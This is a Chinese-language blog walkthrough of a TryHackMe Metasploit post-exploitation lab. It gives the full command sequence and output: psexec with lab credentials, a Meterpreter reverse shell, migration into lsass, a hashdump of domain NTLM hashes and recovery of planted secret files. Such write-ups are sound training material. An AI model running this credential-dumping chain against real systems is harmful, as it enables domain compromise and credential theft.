TryHackMe-渗透测试11_log

Matesploit 漏洞利用后 挑战

以下问题将帮助您更好地了解如何在开发后使用 Meterpreter。

您可以使用以下凭据来模拟通过 SMB(服务器消息块)的初始入侵(使用 exploit/windows/smb/psexec)

Username: ballen

Password: Password1

< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
msf6 > nmap -sS 10.10.214.4
[*] exec: nmap -sS 10.10.214.4

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 19:30 CST
Nmap scan report for 10.10.214.4 (10.10.214.4)
Host is up (0.23s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
msf6 > use exploit/windows/smb/psexec 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.214.4
rhosts => 10.10.214.4
msf6 exploit(windows/smb/psexec) > set lhost 10.14.39.48
lhost => 10.14.39.48
msf6 exploit(windows/smb/psexec) > set smbuser ballen
smbuser => ballen
msf6 exploit(windows/smb/psexec) > set smbpass Password1
smbpass => Password1
msf6 exploit(windows/smb/psexec) > run

meterpreter> getuid ,发现是:

Server username: NT AUTHORITY\SYSTEM
1.计算机名称是什么?
meterpreter > sysinfo
Computer        : ACME-TEST
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : FLASH
Logged On Users : 8
Meterpreter     : x86/windows

ACME-TEST

2.目标域是什么?
从上一问处得知,FLASH
3.用户可能创建的共享的名称是什么?
msf6 post(windows/gather/enum_shares) > run

[*] Running module against ACME-TEST (10.10.214.4)
[*] The following shares were found:
[*] 	Name: SYSVOL
[*] 	Path: C:\Windows\SYSVOL\sysvol
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: NETLOGON
[*] 	Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: speedster
[*] 	Path: C:\Shares\speedster
[*] 	Type: DISK
[*] 
[*] Post module execution completed

前两个Remark: Logon server share,故第三个 speedster

4.jchambers 用户的 NTLM 哈希是什么?

直接hashdump 无权访问。

在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,
从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,
用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,
存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。

ps查看进程表,迁移至lsass进程:

meterpreter > migrate 764
[*] Migrating from 2868 to 764...
[*] Migration completed successfully.

此时再输入hashdump:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:ade6f690c69ea738af21a4dc2df4adf7:::

69596c7aa1e8daee17f8e78870e25a5c

5.jchambers用户的明文密码是什么?

随便找个撞库在线网站,得到:Trustno1

6.“秘密.txt”文件位于何处?
meterpreter > search -f secrets.txt
Found 1 result...
=================

Path                                                            Size (bytes)  Modified (UTC)
----                                                            ------------  --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt  35            2021-07-30 15:44:27 +0800

C:\Program Files (x86)\Windows Multimedia Platform\

7.“秘密.txt”文件中透露的推特密码是什么?
meterpreter > shell
Process 3552 created.
Channel 1 created.
C:\Windows\system32>type C:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

My Twitter password is KDSvbsw3849!

8.“realsecret.txt”文件在哪里?
c:\Program Files (x86)\Windows Multimedia Platform>exit
exit
meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                               Size (bytes)  Modified (UTC)
----                               ------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34            2021-07-30 16:30:24 +0800

c:\inetpub\wwwroot\

9.真正的秘密是什么?
c:\Program Files (x86)\Windows Multimedia Platform>exit
exit
meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                               Size (bytes)  Modified (UTC)
----                               ------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34            2021-07-30 16:30:24 +0800

meterpreter > cat c:\inetpub\wwwroot\realsecret.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.
meterpreter > cat c:\\inetpub\\wwwroot\\realsecret.txt
The Flash is the fastest man alive

The Flash is the fastest man alive

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值